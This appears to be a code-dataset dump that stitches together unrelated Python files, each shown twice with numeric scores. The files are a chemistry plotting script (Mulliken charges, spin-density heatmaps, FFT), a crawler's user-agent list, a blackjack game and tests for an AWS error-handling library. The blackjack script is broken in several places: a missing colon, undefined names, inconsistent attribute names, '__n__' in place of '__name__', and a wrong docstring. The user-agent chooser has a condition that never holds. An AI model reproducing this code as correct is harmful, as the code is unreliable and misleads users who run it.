try: symbol = ATOMICLABELS[manifest['atomnos'][str(atom_number)]-1]
except: symbol = '?'
axes[n].plot(times, mq[i], label='{} [{}]'.format(symbol, atom_number), color=get_nth_col(atom_number))
axes[n].set_title('Mulliken charge evolution (H Summed)')
axes[n].set_ylabel('Mulliken charge')
axes[n].set_xlabel('Time (fs)')
axes[n].legend(loc='upper right')
# Heatmaps - currently SD/MQ (may want to add BL)
elif cmd == 'HM':
def sbin_vals(nb, vals, val_scale, max_val, min_val):
x = np.zeros(nb)
step = (max_val-min_val)/nb
for n, v in enumerate(vals):
for i in range(nb):
if (min_val + i * step) < v < (min_val + (i+1) * step):
x[i] += val_scale[n]
return x[::-1]
def bin_vals(nb, vals, max_val, min_val):
val_len = len(vals)
return sbin_vals (nb, vals, np.repeat(1, val_len), max_val, min_val)
mode, selector, nbins, minval, maxval = ins.split(':')
nbins = int(nbins)
minval = float(minval)
maxval = float(maxval)
bindata = np.zeros((len(times), nbins))
if mode == 'sd':
atom_number = int(selector)
mapper = manifest['spindenmap'].index(atom_number)
try: symbol = ATOMICLABELS[manifest['atomnos'][str(atom_number)]-1]
except: symbol = '?'
axes[n].set_title(f'Spin denisity (H Summed) heatmap for atom {symbol}[{atom_number}]')
axes[n].set_xlabel('Spin density (H Summed)')
ave_data = np.load(os.path.join(basepath, 'sd_ave'))[mapper]
unbinned_data=np.load(os.path.join(basepath, 'sd'))[mapper]
elif mode == 'mq':
atom_number = int(selector)
mapper = manifest['mullikenmap'].index(atom_number)
try: symbol = ATOMICLABELS[manifest['atomnos'][str(atom_number)]-1]
except: symbol = '?'
axes[n].set_title(f'Mulliken charge (H Summed) heatmap for atom {symbol}[{atom_number}]')
axes[n].set_xlabel('Mulliken charge (H Summed)')
ave_data = np.load(os.path.join(basepath, 'mq_ave'))[mapper]
unbinned_data=np.load(os.path.join(basepath, 'mq'))[mapper]
else:
raise Exception(f"Illegal mode {mode} for heatmap")
for i, _ in enumerate(times):
bindata[i] = bin_vals(nbins, unbinned_data[i], maxval, minval)
axes[n].set_xlabel('Time (fs)')
timewidth = (times[1]-times[0])/2 # Tiny fudging to get heatmap to align nicely
axes[n].imshow(bindata.T, cmap='inferno', extent=(-timewidth, times[-1]+timewidth, minval, maxval), aspect='auto')
axes[n].plot(times, ave_data, color='white', linestyle='dotted',linewidth=2)
# FFT
elif cmd == 'FFT':
# [FFT=cd|mq|csf:CHOP:[START-END]|A]
mode, CHOP, RANGE, selector = ins.split(':')
CHOP=int(CHOP)
selector = None if selector == 'A' else [int(i) for i in selector.split(',')]
if mode == 'csf': data = diabats
elif mode == 'mq': data = mq
elif mode == 'sd': data = sd
else: raise Exception('Illegal FFT mode')
print(data.shape, len(times))
assert(data.shape[1] == len(times)) # Make sure extract worked
if RANGE != 'A':
s_idx, e_idx = [int(i) for i in RANGE.split('-')]
times_fft = times[s_idx:e_idx]
data_fft = data.T[s_idx:e_idx].T
else:
times_fft = times
data_fft = data
# Do FFT and plot up
N = data_fft.shape[1]
fig = plt.figure(num=manifest_path, figsize=(20.0, 15.0))
for i in range(data_fft.shape[0]):
if mode=='csf': # CSFs are picked by index
if selector == None : pass
elif i+1 not in selector: continue
ft = np.fft.fft(data_fft[i])
ft = ft.real**2 + ft.imag**2
freq = np.fft.fftfreq(N, d=times_fft[1]-times_fft[0])
if mode == 'sd' or mode == 'mq': # SD/MQ are picked based on atom number
if mode == 'sd' : atom_number = manifest['spindenmap'][i]
else : atom_number = manifest['mullikenmap'][i]
if selector == None : pass
elif atom_number not in selector: continue
try: symbol = ATOMICLABELS[manifest['atomnos'][str(atom_number)]-1]
except: symbol = '?'
label = f'{symbol}[{atom_number}]'
colour = get_nth_col(atom_number)
else:
label = f'CSF {i+1}'
colour = get_nth_col(i)
axes[n].plot(freq[CHOP:int(N/2)], ft[CHOP:int(N/2)], label=label, color=colour)
axes[n].set_title(f'FFT {mode}')
axes[n].set_ylabel('Intensity')
axes[n].set_xlabel('Frequency PHz')
axes[n].legend(loc='upper right')
else:
raise Exception(f'Illegal mode {cmd}')
fig.tight_layout()
if OUTPUT=='x11' : plt.show()
else: plt.savefig(OUTPUT, dpi=500)
| 0.278159 | 0.291006 |
import random
class UserAgent:
pc_agents = [
'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50',
'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0)',
'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:2.0.1) Gecko/20100101 Firefox/4.0.1',
'Mozilla/5.0 (Windows NT 6.1; rv:2.0.1) Gecko/20100101 Firefox/4.0.1',
'Opera/9.80 (Macintosh; Intel Mac OS X 10.6.8; U; en) Presto/2.8.131 Version/11.11',
'Opera/9.80 (Windows NT 6.1; U; en) Presto/2.8.131 Version/11.11',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11',
'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Maxthon 2.0)',
'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; TencentTraveler 4.0)',
'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)',
'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; The World)',
'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; SE 2.X MetaSr 1.0; SE 2.X MetaSr 1.0; .NET CLR 2.0.50727; SE 2.X MetaSr 1.0)',
'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; 360SE)',
'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Avant Browser)',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11',
'Opera/9.25 (Windows NT 5.1; U; en)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)',
'Mozilla/5.0 (compatible; Konqueror/3.5; Linux) KHTML/3.5.5 (like Gecko) (Kubuntu)',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.0.12) Gecko/20070731 Ubuntu/dapper-security Firefox/1.5.0.12',
'Lynx/2.8.5rel.1 libwww-FM/2.14 SSL-MM/1.4.1 GNUTLS/1.2.9',
"Mozilla/5.0 (X11; Linux i686) AppleWebKit/535.7 (KHTML, like Gecko) Ubuntu/11.04 Chromium/16.0.912.77 Chrome/16.0.912.77 Safari/535.7",
"Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:10.0) Gecko/20100101 Firefox/10.0 ",
]
mobile_agents = [
'Mozilla/5.0 (iPhone; U; CPU iPhone OS 4_3_3 like Mac OS X; en-us) AppleWebKit/533.17.9 (KHTML, like Gecko) Version/5.0.2 Mobile/8J2 Safari/6533.18.5',
'Mozilla/5.0 (iPod; U; CPU iPhone OS 4_3_3 like Mac OS X; en-us) AppleWebKit/533.17.9 (KHTML, like Gecko) Version/5.0.2 Mobile/8J2 Safari/6533.18.5',
'Mozilla/5.0 (iPad; U; CPU OS 4_3_3 like Mac OS X; en-us) AppleWebKit/533.17.9 (KHTML, like Gecko) Version/5.0.2 Mobile/8J2 Safari/6533.18.5',
'Mozilla/5.0 (Linux; U; Android 2.3.7; en-us; Nexus One Build/FRF91) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1',
'MQQBrowser/26 Mozilla/5.0 (Linux; U; Android 2.3.7; zh-cn; MB200 Build/GRJ22; CyanogenMod-7) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1',
'Opera/9.80 (Android 2.3.4; Linux; Opera Mobi/build-1107180945; U; en-GB) Presto/2.8.149 Version/11.10',
'Mozilla/5.0 (Linux; U; Android 3.0; en-us; Xoom Build/HRI39) AppleWebKit/534.13 (KHTML, like Gecko) Version/4.0 Safari/534.13',
'Mozilla/5.0 (BlackBerry; U; BlackBerry 9800; en) AppleWebKit/534.1+ (KHTML, like Gecko) Version/6.0.0.337 Mobile Safari/534.1+',
'Mozilla/5.0 (hp-tablet; Linux; hpwOS/3.0.0; U; en-US) AppleWebKit/534.6 (KHTML, like Gecko) wOSBrowser/233.70 Safari/534.6 TouchPad/1.0',
'Mozilla/5.0 (SymbianOS/9.4; Series60/5.0 NokiaN97-1/20.0.019; Profile/MIDP-2.1 Configuration/CLDC-1.1) AppleWebKit/525 (KHTML, like Gecko) BrowserNG/7.1.18124',
'Mozilla/5.0 (compatible; MSIE 9.0; Windows Phone OS 7.5; Trident/5.0; IEMobile/9.0; HTC; Titan)',
'Mozilla/4.0 (compatible; MSIE 6.0; ) Opera/UCWEB7.0.2.37/28/999'
]
@staticmethod
def get_pc_agent(index):
return UserAgent.pc_agents[index]
@staticmethod
def get_mobile_agent(index):
return UserAgent.mobile_agents[index]
@staticmethod
def get_pc_agent_randomly():
index = random.randint(0, len(UserAgent.pc_agents)-1)
return UserAgent.get_pc_agent(index)
@staticmethod
def get_mobile_agent_randomly():
index = random.randint(0, len(UserAgent.mobile_agents)-1)
return UserAgent.get_mobile_agent(index)
@staticmethod
def get_agent_randomly():
if random.randint(1, 10) / 2 == 0:
return UserAgent.get_pc_agent_randomly()
else:
return UserAgent.get_mobile_agent_randomly()
|
python/img/reptiles_imgs/util/user_agents.py
|
import random
class UserAgent:
pc_agents = [
'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50',
'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0)',
'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:2.0.1) Gecko/20100101 Firefox/4.0.1',
'Mozilla/5.0 (Windows NT 6.1; rv:2.0.1) Gecko/20100101 Firefox/4.0.1',
'Opera/9.80 (Macintosh; Intel Mac OS X 10.6.8; U; en) Presto/2.8.131 Version/11.11',
'Opera/9.80 (Windows NT 6.1; U; en) Presto/2.8.131 Version/11.11',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11',
'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Maxthon 2.0)',
'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; TencentTraveler 4.0)',
'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)',
'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; The World)',
'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; SE 2.X MetaSr 1.0; SE 2.X MetaSr 1.0; .NET CLR 2.0.50727; SE 2.X MetaSr 1.0)',
'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; 360SE)',
'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Avant Browser)',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11',
'Opera/9.25 (Windows NT 5.1; U; en)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)',
'Mozilla/5.0 (compatible; Konqueror/3.5; Linux) KHTML/3.5.5 (like Gecko) (Kubuntu)',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.0.12) Gecko/20070731 Ubuntu/dapper-security Firefox/1.5.0.12',
'Lynx/2.8.5rel.1 libwww-FM/2.14 SSL-MM/1.4.1 GNUTLS/1.2.9',
"Mozilla/5.0 (X11; Linux i686) AppleWebKit/535.7 (KHTML, like Gecko) Ubuntu/11.04 Chromium/16.0.912.77 Chrome/16.0.912.77 Safari/535.7",
"Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:10.0) Gecko/20100101 Firefox/10.0 ",
]
mobile_agents = [
'Mozilla/5.0 (iPhone; U; CPU iPhone OS 4_3_3 like Mac OS X; en-us) AppleWebKit/533.17.9 (KHTML, like Gecko) Version/5.0.2 Mobile/8J2 Safari/6533.18.5',
'Mozilla/5.0 (iPod; U; CPU iPhone OS 4_3_3 like Mac OS X; en-us) AppleWebKit/533.17.9 (KHTML, like Gecko) Version/5.0.2 Mobile/8J2 Safari/6533.18.5',
'Mozilla/5.0 (iPad; U; CPU OS 4_3_3 like Mac OS X; en-us) AppleWebKit/533.17.9 (KHTML, like Gecko) Version/5.0.2 Mobile/8J2 Safari/6533.18.5',
'Mozilla/5.0 (Linux; U; Android 2.3.7; en-us; Nexus One Build/FRF91) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1',
'MQQBrowser/26 Mozilla/5.0 (Linux; U; Android 2.3.7; zh-cn; MB200 Build/GRJ22; CyanogenMod-7) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1',
'Opera/9.80 (Android 2.3.4; Linux; Opera Mobi/build-1107180945; U; en-GB) Presto/2.8.149 Version/11.10',
'Mozilla/5.0 (Linux; U; Android 3.0; en-us; Xoom Build/HRI39) AppleWebKit/534.13 (KHTML, like Gecko) Version/4.0 Safari/534.13',
'Mozilla/5.0 (BlackBerry; U; BlackBerry 9800; en) AppleWebKit/534.1+ (KHTML, like Gecko) Version/6.0.0.337 Mobile Safari/534.1+',
'Mozilla/5.0 (hp-tablet; Linux; hpwOS/3.0.0; U; en-US) AppleWebKit/534.6 (KHTML, like Gecko) wOSBrowser/233.70 Safari/534.6 TouchPad/1.0',
'Mozilla/5.0 (SymbianOS/9.4; Series60/5.0 NokiaN97-1/20.0.019; Profile/MIDP-2.1 Configuration/CLDC-1.1) AppleWebKit/525 (KHTML, like Gecko) BrowserNG/7.1.18124',
'Mozilla/5.0 (compatible; MSIE 9.0; Windows Phone OS 7.5; Trident/5.0; IEMobile/9.0; HTC; Titan)',
'Mozilla/4.0 (compatible; MSIE 6.0; ) Opera/UCWEB7.0.2.37/28/999'
]
@staticmethod
def get_pc_agent(index):
return UserAgent.pc_agents[index]
@staticmethod
def get_mobile_agent(index):
return UserAgent.mobile_agents[index]
@staticmethod
def get_pc_agent_randomly():
index = random.randint(0, len(UserAgent.pc_agents)-1)
return UserAgent.get_pc_agent(index)
@staticmethod
def get_mobile_agent_randomly():
index = random.randint(0, len(UserAgent.mobile_agents)-1)
return UserAgent.get_mobile_agent(index)
@staticmethod
def get_agent_randomly():
if random.randint(1, 10) / 2 == 0:
return UserAgent.get_pc_agent_randomly()
else:
return UserAgent.get_mobile_agent_randomly()
| 0.393502 | 0.047758 |
import sys
import pyCardDeck
from pyCardDeck.cards import PokerCard
class person:
def __init__(self, name: str):
self.h = []
self.n = name
def __str__(self):
return self.n
class BlackTheJack:
def __init__(self, persons: List[Person]):
self.d = pyCardDeck.Deck()
self.d.load_standard_deck()
for i in range(44)
bur = self.deck.draw()
if bur == 10:
self.deck.discard(bur)
self.persons = persons
self.scores = {}
print("Lets play a game with {} pppl.".format(len(self.persons)))
def blackjack(self):
"""
now black jack
if no one got 21 the person with closest to 21 wins
"""
print("lets start")
print("Shuffled")
self.deck.discard('eight')
self.deck.shuffle()
print("its a deasl.")
self.deal()
print("now playh")
for person in self.persons:
print("{}the turn is urs".format(person.n))
self.play(person)
else:
self.find_winner()
def deal(self):
"""
now the 10 person.
"""
for _ in range(10):
for p in self.persons:
newcard = self.deck.draw()
p.h.append(newcard)
print("{} {}.".format(p.n, str(newcard)))
def find_winner(self):
"""
lets find the winner.
"""
winners = []
try:
win_score = max(self.scores.values())
for key in self.scores.keys():
if self.scores[key] == win_score:
winners.append(key)
else:
winstring = " & ".join(winners)
print("the wonner is {}!".format(winstring))
except ValueError:
print("no one one")
def hit(self, person):
newcard = self.deck.draw()
person.h.append(newcard)
print("Drew the {}.".format(str(newcard)))
def play(self, person):
"""
An individual person's turn.
If the person's cards are an ace and a ten or court card,
the person has a blackjack and wins.
If a person's cards total more than 21, the person loses.
Otherwise, it takes the sum of their cards and determines whether
to hit or stand based on their current score.
"""
while True:
points = sum_h(person.h)
if points < 17:
print(" Hit.")
self.hit(person)
elif points == 21:
print(" {} youwins!".format(person.n))
sys.exit(0) # End if someone wins
elif points > 21:
print(" its Bust!")
break
else: # Stand if between 17 and 20 (inclusive)
print(" the Standing at {} points.".format(str(points)))
self.scores[person.n] = points
break
def sum_h(h: list):
"""
it convers the alphanet carfds to number eg A=1,10 J=11
"""
vals = [card.rank for card in h]
intvals = []
while len(vals) > 0:
value = vals.pop()
try:
intvals.append(int(value))
except ValueError:
if value in ['K', 'Q', 'J']:
intvals.append(10)
elif value == 'A':
intvals.append(1) # Keep it simple for the sake of example
if intvals == [1, 10] or intvals == [10, 1]:
print(" Blackjack!")
return(21)
else:
points = sum(intvals)
print(" Current score: {}".format(str(points)))
return(points)
if __n__ == "__main__":
game = BlackTheJack([Person("RAM"), Person("SITA"), Person("AMBANI"),Person("JHON"), Person("PLAYES"),
Person("DCKSON")])
game.blackjack()
|
task2.py
|
import sys
import pyCardDeck
from pyCardDeck.cards import PokerCard
class person:
def __init__(self, name: str):
self.h = []
self.n = name
def __str__(self):
return self.n
class BlackTheJack:
def __init__(self, persons: List[Person]):
self.d = pyCardDeck.Deck()
self.d.load_standard_deck()
for i in range(44)
bur = self.deck.draw()
if bur == 10:
self.deck.discard(bur)
self.persons = persons
self.scores = {}
print("Lets play a game with {} pppl.".format(len(self.persons)))
def blackjack(self):
"""
now black jack
if no one got 21 the person with closest to 21 wins
"""
print("lets start")
print("Shuffled")
self.deck.discard('eight')
self.deck.shuffle()
print("its a deasl.")
self.deal()
print("now playh")
for person in self.persons:
print("{}the turn is urs".format(person.n))
self.play(person)
else:
self.find_winner()
def deal(self):
"""
now the 10 person.
"""
for _ in range(10):
for p in self.persons:
newcard = self.deck.draw()
p.h.append(newcard)
print("{} {}.".format(p.n, str(newcard)))
def find_winner(self):
"""
lets find the winner.
"""
winners = []
try:
win_score = max(self.scores.values())
for key in self.scores.keys():
if self.scores[key] == win_score:
winners.append(key)
else:
winstring = " & ".join(winners)
print("the wonner is {}!".format(winstring))
except ValueError:
print("no one one")
def hit(self, person):
newcard = self.deck.draw()
person.h.append(newcard)
print("Drew the {}.".format(str(newcard)))
def play(self, person):
"""
An individual person's turn.
If the person's cards are an ace and a ten or court card,
the person has a blackjack and wins.
If a person's cards total more than 21, the person loses.
Otherwise, it takes the sum of their cards and determines whether
to hit or stand based on their current score.
"""
while True:
points = sum_h(person.h)
if points < 17:
print(" Hit.")
self.hit(person)
elif points == 21:
print(" {} youwins!".format(person.n))
sys.exit(0) # End if someone wins
elif points > 21:
print(" its Bust!")
break
else: # Stand if between 17 and 20 (inclusive)
print(" the Standing at {} points.".format(str(points)))
self.scores[person.n] = points
break
def sum_h(h: list):
"""
it convers the alphanet carfds to number eg A=1,10 J=11
"""
vals = [card.rank for card in h]
intvals = []
while len(vals) > 0:
value = vals.pop()
try:
intvals.append(int(value))
except ValueError:
if value in ['K', 'Q', 'J']:
intvals.append(10)
elif value == 'A':
intvals.append(1) # Keep it simple for the sake of example
if intvals == [1, 10] or intvals == [10, 1]:
print(" Blackjack!")
return(21)
else:
points = sum(intvals)
print(" Current score: {}".format(str(points)))
return(points)
if __n__ == "__main__":
game = BlackTheJack([Person("RAM"), Person("SITA"), Person("AMBANI"),Person("JHON"), Person("PLAYES"),
Person("DCKSON")])
game.blackjack()
| 0.251096 | 0.219861 |
import pytest
import re
import secrets
from botocore.exceptions import ClientError
from aws_error_utils import (
get_aws_error_info,
aws_error_matches,
catch_aws_error,
ALL_CODES,
ALL_OPERATIONS,
errors,
make_aws_error,
)
rand_str = lambda: secrets.token_hex(4)
def _make_test_error(
operation_name, code=None, message=None, http_status_code=None, error=True
):
response = {}
if error or code or message:
response["Error"] = {}
if code:
response["Error"]["Code"] = code
if message:
response["Error"]["Message"] = message
if http_status_code:
response["ResponseMetadata"] = {"HTTPStatusCode": http_status_code}
return ClientError(response, operation_name)
def test_create_error_info():
error = _make_test_error("AssumeRole", "RegionDisabled", http_status_code=403)
error_info = get_aws_error_info(error)
assert error_info.code == "RegionDisabled"
assert error_info.operation_name == "AssumeRole"
assert error_info.http_status_code == 403
assert error_info.message is None
not_error = ValueError("not a ClientError")
with pytest.raises(TypeError):
get_aws_error_info(not_error)
def test_error_info_missing_code():
error = _make_test_error("AssumeRole")
error_info = get_aws_error_info(error)
assert error_info.code is None
def test_error_matches_requries_code():
with pytest.raises(ValueError, match="No error codes provided"):
error = _make_test_error("AssumeRole", "RegionDisabled")
aws_error_matches(error)
with pytest.raises(ValueError, match="No error codes provided"):
error = _make_test_error("AssumeRole", "RegionDisabled")
aws_error_matches(error, operation_name="AssumeRole")
def test_error_matches_single():
error = _make_test_error("AssumeRole", "RegionDisabled")
assert aws_error_matches(error, "RegionDisabled")
assert aws_error_matches(error, "RegionDisabled", "OtherCode")
assert aws_error_matches(error, "RegionDisabled", code="OtherCode")
assert aws_error_matches(error, "RegionDisabled", code=["OtherCode"])
assert aws_error_matches(error, "OtherCode", code="RegionDisabled")
assert aws_error_matches(error, "OtherCode", code=["RegionDisabled"])
assert not aws_error_matches(error, "OtherCode")
assert not aws_error_matches(error, code="OtherCode")
assert not aws_error_matches(error, code=["OtherCode"])
assert aws_error_matches(error, "RegionDisabled", operation_name="AssumeRole")
assert aws_error_matches(
error, "RegionDisabled", operation_name=["AssumeRole", "OtherOp"]
)
assert not aws_error_matches(error, "RegionDisabled", operation_name="OtherOp")
def test_error_matches_all():
code = rand_str()
error = _make_test_error("OpName", code)
assert aws_error_matches(error, ALL_CODES)
assert not aws_error_matches(error, "SpecificCode")
op_name = rand_str()
error = _make_test_error(op_name, "SomeCode")
assert aws_error_matches(error, "SomeCode", operation_name=ALL_OPERATIONS)
assert not aws_error_matches(error, "SomeCode", operation_name="SpecificOperation")
def test_catch():
error = _make_test_error("AssumeRole", "RegionDisabled")
try:
raise error
except catch_aws_error("RegionDisabled") as e:
assert e is error
with pytest.raises(ClientError, match=re.escape(str(error))):
try:
raise error
except catch_aws_error("OtherCode") as e:
assert False
def matcher(client_error):
return client_error is error
try:
raise error
except catch_aws_error(matcher) as e:
assert e is error
def nonmatcher(client_error):
return False
with pytest.raises(ClientError, match=re.escape(str(error))):
try:
raise error
except catch_aws_error(nonmatcher) as e:
assert False
class OtherError(Exception):
pass
try:
raise OtherError("test")
except catch_aws_error(ALL_CODES) as e:
assert False
except OtherError:
assert True
def test_catch_sets_info():
operation_name = rand_str()
code = rand_str()
message = rand_str()
http_status_code = 404
error = _make_test_error(
operation_name, code=code, message=message, http_status_code=http_status_code
)
try:
raise error
except catch_aws_error(code) as error:
assert error.operation_name == operation_name
assert error.code == code
assert error.message == message
assert error.http_status_code == http_status_code
def test_errors():
error = _make_test_error("AssumeRole", "RegionDisabled", http_status_code=403)
try:
raise error
assert False
except errors.RegionDisabled:
pass
try:
raise error
assert False
except (errors.NoSuchRegion, errors.RegionDisabled):
pass
with pytest.raises(RuntimeError):
errors.RegionDisabled
with pytest.raises(RuntimeError):
errors()
def test_make_aws_error():
args = {
"operation_name": "AssumeRole",
"code": "RegionDisabled",
"message": "Region is disabled",
"http_status_code": 403,
}
error_standard = _make_test_error(**args)
error = make_aws_error(**args)
assert isinstance(error, ClientError)
assert error_standard.operation_name == error.operation_name
assert error_standard.response == error.response
assert error_standard.args == error.args
try:
raise make_aws_error(**args)
except errors.RegionDisabled:
pass
response_key1 = rand_str()
response_value1 = rand_str()
response_key2 = rand_str()
response_key3 = rand_str()
response_value3 = rand_str()
response = {
response_key1: response_value1,
"ResponseMetadata": {
response_key2: {
response_key3: response_value3,
}
},
}
error_code = rand_str()
operation_name = rand_str()
http_status_code = 404
error = make_aws_error(
code=error_code,
message=None,
operation_name=operation_name,
http_status_code=http_status_code,
response=response,
)
assert not error.response is response # a copy was made
assert "Error" not in response
assert error.response == {
"Error": {"Code": error_code},
response_key1: response_value1,
"ResponseMetadata": {
"HTTPStatusCode": http_status_code,
response_key2: {
response_key3: response_value3,
},
},
}
|
test_aws_error_utils.py
|
import pytest
import re
import secrets
from botocore.exceptions import ClientError
from aws_error_utils import (
get_aws_error_info,
aws_error_matches,
catch_aws_error,
ALL_CODES,
ALL_OPERATIONS,
errors,
make_aws_error,
)
rand_str = lambda: secrets.token_hex(4)
def _make_test_error(
operation_name, code=None, message=None, http_status_code=None, error=True
):
response = {}
if error or code or message:
response["Error"] = {}
if code:
response["Error"]["Code"] = code
if message:
response["Error"]["Message"] = message
if http_status_code:
response["ResponseMetadata"] = {"HTTPStatusCode": http_status_code}
return ClientError(response, operation_name)
def test_create_error_info():
error = _make_test_error("AssumeRole", "RegionDisabled", http_status_code=403)
error_info = get_aws_error_info(error)
assert error_info.code == "RegionDisabled"
assert error_info.operation_name == "AssumeRole"
assert error_info.http_status_code == 403
assert error_info.message is None
not_error = ValueError("not a ClientError")
with pytest.raises(TypeError):
get_aws_error_info(not_error)
def test_error_info_missing_code():
error = _make_test_error("AssumeRole")
error_info = get_aws_error_info(error)
assert error_info.code is None
def test_error_matches_requries_code():
with pytest.raises(ValueError, match="No error codes provided"):
error = _make_test_error("AssumeRole", "RegionDisabled")
aws_error_matches(error)
with pytest.raises(ValueError, match="No error codes provided"):
error = _make_test_error("AssumeRole", "RegionDisabled")
aws_error_matches(error, operation_name="AssumeRole")
def test_error_matches_single():
error = _make_test_error("AssumeRole", "RegionDisabled")
assert aws_error_matches(error, "RegionDisabled")
assert aws_error_matches(error, "RegionDisabled", "OtherCode")
assert aws_error_matches(error, "RegionDisabled", code="OtherCode")
assert aws_error_matches(error, "RegionDisabled", code=["OtherCode"])
assert aws_error_matches(error, "OtherCode", code="RegionDisabled")
assert aws_error_matches(error, "OtherCode", code=["RegionDisabled"])
assert not aws_error_matches(error, "OtherCode")
assert not aws_error_matches(error, code="OtherCode")
assert not aws_error_matches(error, code=["OtherCode"])
assert aws_error_matches(error, "RegionDisabled", operation_name="AssumeRole")
assert aws_error_matches(
error, "RegionDisabled", operation_name=["AssumeRole", "OtherOp"]
)
assert not aws_error_matches(error, "RegionDisabled", operation_name="OtherOp")
def test_error_matches_all():
code = rand_str()
error = _make_test_error("OpName", code)
assert aws_error_matches(error, ALL_CODES)
assert not aws_error_matches(error, "SpecificCode")
op_name = rand_str()
error = _make_test_error(op_name, "SomeCode")
assert aws_error_matches(error, "SomeCode", operation_name=ALL_OPERATIONS)
assert not aws_error_matches(error, "SomeCode", operation_name="SpecificOperation")
def test_catch():
error = _make_test_error("AssumeRole", "RegionDisabled")
try:
raise error
except catch_aws_error("RegionDisabled") as e:
assert e is error
with pytest.raises(ClientError, match=re.escape(str(error))):
try:
raise error
except catch_aws_error("OtherCode") as e:
assert False
def matcher(client_error):
return client_error is error
try:
raise error
except catch_aws_error(matcher) as e:
assert e is error
def nonmatcher(client_error):
return False
with pytest.raises(ClientError, match=re.escape(str(error))):
try:
raise error
except catch_aws_error(nonmatcher) as e:
assert False
class OtherError(Exception):
pass
try:
raise OtherError("test")
except catch_aws_error(ALL_CODES) as e:
assert False
except OtherError:
assert True
def test_catch_sets_info():
operation_name = rand_str()
code = rand_str()
message = rand_str()
http_status_code = 404
error = _make_test_error(
operation_name, code=code, message=message, http_status_code=http_status_code
)
try:
raise error
except catch_aws_error(code) as error:
assert error.operation_name == operation_name
assert error.code == code
assert error.message == message
assert error.http_status_code == http_status_code
def test_errors():
error = _make_test_error("AssumeRole", "RegionDisabled", http_status_code=403)
try:
raise error
assert False
except errors.RegionDisabled:
pass
try:
raise error
assert False
except (errors.NoSuchRegion, errors.RegionDisabled):
pass
with pytest.raises(RuntimeError):
errors.RegionDisabled
with pytest.raises(RuntimeError):
errors()
def test_make_aws_error():
args = {
"operation_name": "AssumeRole",
"code": "RegionDisabled",
"message": "Region is disabled",
"http_status_code": 403,
}
error_standard = _make_test_error(**args)
error = make_aws_error(**args)
assert isinstance(error, ClientError)
assert error_standard.operation_name == error.operation_name
assert error_standard.response == error.response
assert error_standard.args == error.args
try:
raise make_aws_error(**args)
except errors.RegionDisabled:
pass
response_key1 = rand_str()
response_value1 = rand_str()
response_key2 = rand_str()
response_key3 = rand_str()
response_value3 = rand_str()
response = {
response_key1: response_value1,
"ResponseMetadata": {
response_key2: {
response_key3: response_value3,
}
},
}
error_code = rand_str()
operation_name = rand_str()
http_status_code = 404
error = make_aws_error(
code=error_code,
message=None,
operation_name=operation_name,
http_status_code=http_status_code,
response=response,
)
assert not error.response is response # a copy was made
assert "Error" not in response
assert error.response == {
"Error": {"Code": error_code},
response_key1: response_value1,
"ResponseMetadata": {
"HTTPStatusCode": http_status_code,
response_key2: {
response_key3: response_value3,
},
},
}
| 0.540924 | 0.319891 |
# pylint: disable=line-too-long
# pylint: disable=too-many-lines
import json
